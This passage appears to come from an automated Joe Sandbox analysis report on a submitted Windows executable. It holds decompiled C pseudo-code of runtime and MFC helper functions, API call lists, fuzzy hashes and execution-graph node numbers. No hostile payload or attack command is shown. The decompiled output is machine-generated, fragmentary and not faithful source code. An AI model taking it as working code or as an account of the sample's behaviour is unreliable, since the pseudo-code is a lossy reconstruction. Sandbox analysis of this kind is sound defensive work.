                                                        • Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                      • UnregisterClassA.USER32 ref: 0041A358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$ClassH_prolog3InitializeLeaveUnregister
                                                      • String ID: hnC
                                                      • API String ID: 2524309216-2905478537
                                                      • Opcode ID: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
                                                      • Instruction ID: dc9c157aa842fe30cd6fe9b5929375e780ac80eaa54db6f8b7d68f330885adc6
                                                      • Opcode Fuzzy Hash: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
                                                      • Instruction Fuzzy Hash: 7611737190110A9FCB10EBE5C851AEEB779AF44308F00057FB112B72D2CA3C6A49CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E00402F17(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                      				char _v8;
                                                      				char _v16;
                                                      				char _v24;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t20;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				void* _t27;
                                                      				void* _t28;
                                                      				void* _t30;
                                                      
                                                      				_t26 = __esi;
                                                      				_t25 = __edi;
                                                      				_t23 = __ecx;
                                                      				_t22 = __ebx;
                                                      				_t10 = _a4;
                                                      				if(_t10 == 0) {
                                                      					L7:
                                                      					return _t10;
                                                      				} else {
                                                      					if(_t10 == 0xc) {
                                                      						_push(_t27);
                                                      						_t28 = _t30;
                                                      						_push(__ecx);
                                                      						_v8 = 0x442350;
                                                      						E0041F7F4( &_v8, 0x43c4ec);
                                                      						asm("int3");
                                                      						_push(_t28);
                                                      						_t27 = _t30;
                                                      						_push(_t23);
                                                      						_t4 =  &_v16; // 0x442350
                                                      						_v16 = 0x4423e8;
                                                      						E0041F7F4(_t4, 0x43c54c);
                                                      						asm("int3");
                                                      						goto L10;
                                                      					} else {
                                                      						if(_t10 == 0x16 || _t10 == 0x22 || _t10 != 0x50) {
                                                      							L10:
                                                      							_push(_t27);
                                                      							_push(_t23);
                                                      							_t6 =  &_v24; // 0x4423e8
                                                      							_v24 = 0x442480;
                                                      							E0041F7F4(_t6, 0x43c590);
                                                      							asm("int3");
                                                      							_push(4);
                                                      							E0041F6EA(E00431BFC, _t22, _t25, _t26);
                                                      							_t24 = E0040F014(0x104);
                                                      							_v36 = _t24;
                                                      							_t20 = 0;
                                                      							_v24 = 0;
                                                      							if(_t24 != 0) {
                                                      								_t20 = E0040D519(_t24);
                                                      							}
                                                      							return E0041F7C2(_t20);
                                                      						} else {
                                                      							goto L7;
                                                      						}
                                                      					}
                                                      				}
                                                      			}


















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Exception@8H_prolog3Throw
                                                      • String ID: #D
                                                      • API String ID: 3670251406-724133492
                                                      • Opcode ID: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
                                                      • Instruction ID: b0f2db476828d076c5aa5a1c3ccda07ec6cbf835b824b1e618174a28debf0169
                                                      • Opcode Fuzzy Hash: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
                                                      • Instruction Fuzzy Hash: 98F059B4210202ABDF24EBA9455956F21A89B48748F60487BF101F22C1E6BCCA80A62E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E004127B4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t35;
                                                      				void* _t36;
                                                      
                                                      				_t36 = __eflags;
                                                      				_push(4);
                                                      				E0041F6EA(E00432BE0, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t35 - 0x10)) = __ecx;
                                                      				E004048ED(__ecx, _t36);
                                                      				 *((intOrPtr*)(_t35 - 4)) = 0;
                                                      				 *((intOrPtr*)(__ecx)) = 0x43688c;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t35 + 8));
                                                      				E00419FBF(__ecx + 0x24, 0xa);
                                                      				 *((char*)(_t35 - 4)) = 1;
                                                      				E00412091(__ecx + 0x40, 0xa);
                                                      				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
                                                      				 *(__ecx + 0x60) =  *(__ecx + 0x60) | 0xffffffff;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x78)) = 0x436954;
                                                      				 *((intOrPtr*)(__ecx + 0x7c)) = 0x436934;
                                                      				return E0041F7C2(__ecx);
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID: 4iC$TiC
                                                      • API String ID: 431132790-4008140021
                                                      • Opcode ID: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
                                                      • Instruction ID: 5d0dc50055799547b18938ce6c7b49451773700af5d5b110cd1056841da70260
                                                      • Opcode Fuzzy Hash: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
                                                      • Instruction Fuzzy Hash: B301FBB1900B419BD720EF2B850564AFFE0BF58714F108A0FE6E6877A1C7B8A645CF49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00409BB5(void* __ebx, void* __edi, void* __eflags) {
                                                      				char _v16;
                                                      				intOrPtr _v28;
                                                      				void* __esi;
                                                      				unsigned int _t11;
                                                      				unsigned int _t12;
                                                      				intOrPtr _t20;
                                                      				intOrPtr _t25;
                                                      				void* _t27;
                                                      				void* _t28;
                                                      
                                                      				_push(_t27);
                                                      				_push(0x4037fd);
                                                      				_t28 = E0040F584(__ebx, 0x44642c, __edi, _t27, __eflags);
                                                      				if(_t28 != 0) {
                                                      					 *((intOrPtr*)(_t28 + 0x68)) = GetMessageTime();
                                                      					_t11 = GetMessagePos();
                                                      					_t12 = _t11 >> 0x10;
                                                      					__eflags = _t12;
                                                      					 *((intOrPtr*)(_t28 + 0x70)) = _t12;
                                                      					 *((intOrPtr*)(_t28 + 0x6c)) = _t11;
                                                      					_t8 = _t28 + 0x58; // 0x58
                                                      					return _t8;
                                                      				} else {
                                                      					_push(0x44642c);
                                                      					_t1 =  &_v16; // 0x4423e8
                                                      					_v16 = 0x442480;
                                                      					E0041F7F4(_t1, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, __ebx, __edi, _t28);
                                                      					_t25 = E0040F014(0x104);
                                                      					_v28 = _t25;
                                                      					_t20 = 0;
                                                      					_v16 = 0;
                                                      					if(_t25 != 0) {
                                                      						_t20 = E0040D519(_t25);
                                                      					}
                                                      					return E0041F7C2(_t20);
                                                      				}
                                                      			}













                                                      APIs
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • GetMessageTime.USER32(004037FD), ref: 00409BD0
                                                      • GetMessagePos.USER32 ref: 00409BD9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Message$H_prolog3Time
                                                      • String ID: ,dD
                                                      • API String ID: 3041656633-3191229884
                                                      • Opcode ID: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
                                                      • Instruction ID: 33c9b5c6f293619a4ac6e8f97073239bc9264db69f185d1a93d85d444b44338a
                                                      • Opcode Fuzzy Hash: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
                                                      • Instruction Fuzzy Hash: 42E046B5800B618BD7219F65A4481AB7AE4EB44366300083FE886E7A50DB38E802CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E004037E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				char _v8;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t14;
                                                      
                                                      				_push(__ecx);
                                                      				_t1 =  &_v8; // 0x4423e8
                                                      				_v8 = 0x442480;
                                                      				E0041F7F4(_t1, 0x43c590);
                                                      				asm("int3");
                                                      				_push(4);
                                                      				E0041F6EA(E00431BFC, __ebx, __edi, __esi);
                                                      				_t14 = E0040F014(0x104);
                                                      				_v20 = _t14;
                                                      				_t10 = 0;
                                                      				_v8 = 0;
                                                      				if(_t14 != 0) {
                                                      					_t10 = E0040D519(_t14);
                                                      				}
                                                      				return E0041F7C2(_t10);
                                                      			}








                                                      APIs
                                                      • __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834
                                                      • __EH_prolog3.LIBCMT ref: 00403804
                                                        • Part of subcall function 0040F014: LocalAlloc.KERNEL32(00000040,00442480,00403813,00000104,00000004,#D,0043C590,?,?,P#D,0043C54C,?,?,000000FF,0043C4EC), ref: 0040F01A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
                                                      • String ID: #D
                                                      • API String ID: 927841988-724133492
                                                      • Opcode ID: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
                                                      • Instruction ID: ed78f3ae13bf56099f920655d6bdc6ccae9d51d717f7131c7a3c52a0a811eed1
                                                      • Opcode Fuzzy Hash: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
                                                      • Instruction Fuzzy Hash: C8D012B5250208BBD600FBD68947ECD715CDB08708F60547BF310A65D2E7F96A89533D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041F481(void* __eax, void* __esi) {
                                                      				void* _t13;
                                                      				intOrPtr _t16;
                                                      
                                                      				_t1 = _t13 + 5;
                                                      				 *_t1 =  *((intOrPtr*)(_t13 + 5)) + __esi;
                                                      				_t16 =  *_t1;
                                                      			}






                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 0041F489
                                                        • Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260B4
                                                        • Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260BE
                                                      • __NMSG_WRITE.LIBCMT ref: 0041F492
                                                        • Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F59
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425F6A
                                                        • Part of subcall function 00425EED: GetModuleFileNameA.KERNEL32(00000000,00446DC9,00000104,?,00401B31,00009618), ref: 00425F86
                                                        • Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F9B
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FAE
                                                        • Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FB7
                                                        • Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FC4
                                                        • Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FF1
                                                        • Part of subcall function 0041F960: ___crtCorExitProcess.LIBCMT ref: 0041F964
                                                        • Part of subcall function 0041F960: ExitProcess.KERNEL32 ref: 0041F96E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$FileModuleName___crt
                                                      • String ID: |hD
                                                      • API String ID: 4122421049-2118069248
                                                      • Opcode ID: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
                                                      • Instruction ID: e70cd8b630b281eaa6359728f90183fb7d6d66781cb960f2164c911ee12c87e2
                                                      • Opcode Fuzzy Hash: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
                                                      • Instruction Fuzzy Hash: 9EC08CB12147103AD600BB12A80391D22608F00B24F22843FF008140D2DB398580600E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040F496(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				void* _t31;
                                                      				intOrPtr _t32;
                                                      				signed int _t38;
                                                      				struct _CRITICAL_SECTION* _t39;
                                                      				intOrPtr* _t44;
                                                      				long* _t47;
                                                      				intOrPtr* _t50;
                                                      
                                                      				_push(__ecx);
                                                      				_t50 = _a4;
                                                      				_t38 = 1;
                                                      				_t47 = __ecx;
                                                      				_v8 = 1;
                                                      				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                                                      					L10:
                                                      					_t39 =  &(_t47[7]);
                                                      					EnterCriticalSection(_t39);
                                                      					E0040F149( &(_t47[5]), _t50);
                                                      					LeaveCriticalSection(_t39);
                                                      					LocalFree( *(_t50 + 0xc));
                                                      					 *((intOrPtr*)( *_t50))(1);
                                                      					_t31 = TlsSetValue( *_t47, 0);
                                                      					L11:
                                                      					return _t31;
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					_t32 = _a8;
                                                      					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
                                                      						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                                                      						if(_t44 != 0) {
                                                      							 *((intOrPtr*)( *_t44))(1);
                                                      						}
                                                      						_t31 =  *(_t50 + 0xc);
                                                      						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                                                      					} else {
                                                      						_t31 =  *(_t50 + 0xc);
                                                      						if( *(_t31 + _t38 * 4) != 0) {
                                                      							_v8 = _v8 & 0x00000000;
                                                      						}
                                                      					}
                                                      					_t38 = _t38 + 1;
                                                      				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                                                      				if(_v8 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				goto L10;
                                                      			}












                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
                                                      • LocalFree.KERNEL32(?), ref: 0040F50C
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                      • String ID:
                                                      • API String ID: 2949335588-0
                                                      • Opcode ID: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
                                                      • Instruction ID: 2b8ded7cbabb034d170cb8e1f6a20b40d79b2ab9c9a6a536b212b17957fcc661
                                                      • Opcode Fuzzy Hash: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
                                                      • Instruction Fuzzy Hash: E8117935600604EFD720CF54D888BAAB7B4FF55315F10843AE9469BAA2CB74B984CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0040FA7F(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                      				void* __edi;
                                                      				struct _CRITICAL_SECTION* _t4;
                                                      				void* _t7;
                                                      				void* _t10;
                                                      				signed int _t11;
                                                      				void* _t14;
                                                      				intOrPtr* _t15;
                                                      				void* _t17;
                                                      
                                                      				_t17 = __ebp;
                                                      				_t14 = __esi;
                                                      				_t7 = __ebx;
                                                      				_t11 = _a4;
                                                      				_t20 = _t11 - 0x11;
                                                      				if(_t11 >= 0x11) {
                                                      					_t4 = E004037E3(__ebx, _t10, _t11, __esi, _t20);
                                                      				}
                                                      				if( *0x44660c == 0) {
                                                      					_t4 = E0040FA16();
                                                      				}
                                                      				_push(_t7);
                                                      				_push(_t17);
                                                      				_push(_t14);
                                                      				_t15 = 0x4467c0 + _t11 * 4;
                                                      				if( *_t15 == 0) {
                                                      					EnterCriticalSection(0x4467a8);
                                                      					if( *_t15 == 0) {
                                                      						_t4 = 0x446610 + _t11 * 0x18;
                                                      						InitializeCriticalSection(_t4);
                                                      						 *_t15 =  *_t15 + 1;
                                                      					}
                                                      					LeaveCriticalSection(0x4467a8);
                                                      				}
                                                      				EnterCriticalSection(0x446610 + _t11 * 0x18);
                                                      				return _t4;
                                                      			}












                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
                                                      • LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                      • String ID:
                                                      • API String ID: 2895727460-0
                                                      • Opcode ID: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
                                                      • Instruction ID: 11894b6c2aef66c6a57d0d31d06213815613db8dfd1157861ab68b14672cec20
                                                      • Opcode Fuzzy Hash: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
                                                      • Instruction Fuzzy Hash: CDF0F6B72001049BDB205F98EC44759B799EBE3319F13103BE04092591DB7D55848E6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040F03C(long* __ecx, signed int _a4) {
                                                      				void* _t9;
                                                      				struct _CRITICAL_SECTION* _t12;
                                                      				signed int _t14;
                                                      				long* _t16;
                                                      
                                                      				_t16 = __ecx;
                                                      				_t1 =  &(_t16[7]); // 0x4465f0
                                                      				_t12 = _t1;
                                                      				EnterCriticalSection(_t12);
                                                      				_t14 = _a4;
                                                      				if(_t14 <= 0) {
                                                      					L5:
                                                      					LeaveCriticalSection(_t12);
                                                      					return 0;
                                                      				}
                                                      				_t3 =  &(_t16[3]); // 0x3
                                                      				if(_t14 >=  *_t3) {
                                                      					goto L5;
                                                      				}
                                                      				_t9 = TlsGetValue( *_t16);
                                                      				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                      					goto L5;
                                                      				} else {
                                                      					LeaveCriticalSection(_t12);
                                                      					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                      				}
                                                      			}








                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F045
                                                      • TlsGetValue.KERNEL32(004465D4,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F05A
                                                      • LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F070
                                                      • LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F07B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterValue
                                                      • String ID:
                                                      • API String ID: 3969253408-0
                                                      • Opcode ID: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
                                                      • Instruction ID: 60d108fa28f27cf260cddbd5588e553d64dca512099a42e32762409037fd1fc8
                                                      • Opcode Fuzzy Hash: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
                                                      • Instruction Fuzzy Hash: 7FF0F47A200A009FC6308F64DC48D5A77A9EAD4351316957BE442A3562DA78F989CA54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:27.6%
                                                      Signature Coverage:2%
                                                      Total number of Nodes:1058
                                                      Total number of Limit Nodes:107

                                                      Graph

421880 33877->33883 33880->33854 33881->33852 33882->33871 33884 4218ac 33883->33884 33885 42188c 33883->33885 33887 4218ba 33884->33887 33889 4218e1 33884->33889 33886 41f8d2 __make__time64_t 68 API calls 33885->33886 33888 421891 33886->33888 33890 41f8d2 __make__time64_t 68 API calls 33887->33890 33894 403f76 33887->33894 33913 424e06 4 API calls 2 library calls 33888->33913 33893 41f8d2 __make__time64_t 68 API calls 33889->33893 33892 4218d6 33890->33892 33916 424e06 4 API calls 2 library calls 33892->33916 33895 4218e6 33893->33895 33894->33864 33897 421921 33895->33897 33898 4218f4 33895->33898 33915 421715 102 API calls 2 library calls 33897->33915 33914 421715 102 API calls 2 library calls 33898->33914 33901 421932 33903 42195a 33901->33903 33905 421944 33901->33905 33902 421906 33902->33903 33904 42190e 33902->33904 33903->33894 33909 41f8d2 __make__time64_t 68 API calls 33903->33909 33906 41f8d2 __make__time64_t 68 API calls 33904->33906 33908 41f8d2 __make__time64_t 68 API calls 33905->33908 33907 421913 33906->33907 33907->33894 33911 41f8d2 __make__time64_t 68 API calls 33907->33911 33910 421949 33908->33910 33909->33892 33910->33894 33912 41f8d2 __make__time64_t 68 API calls 33910->33912 33911->33894 33912->33894 33914->33902 33915->33901 33917 41dfeb 33918 41e009 33917->33918 33919 41dff8 33917->33919 33921 41e007 33918->33921 33922 41e01a SendMessageA 33918->33922 33923 405bfb 33919->33923 33922->33921 33924 405c2b 33923->33924 33925 405c05 33923->33925 33924->33921 33931 409cbe 33925->33931 33930 405c1f KiUserCallbackDispatcher 33930->33924 33932 409c23 ~_Task_impl 111 API calls 33931->33932 33933 405c0e 33932->33933 33934 40ec19 33933->33934 33935 40ec20 33934->33935 33936 405c19 33934->33936 33938 40ebda LocalAlloc RaiseException ~_Task_impl 33935->33938 33936->33924 33936->33930 33938->33936 33939 4265a8 33941 4265ac 33939->33941 33942 4265eb 33941->33942 33943 4265cc Sleep 33941->33943 33945 41ed6a 33941->33945 33944 4265e1 33943->33944 
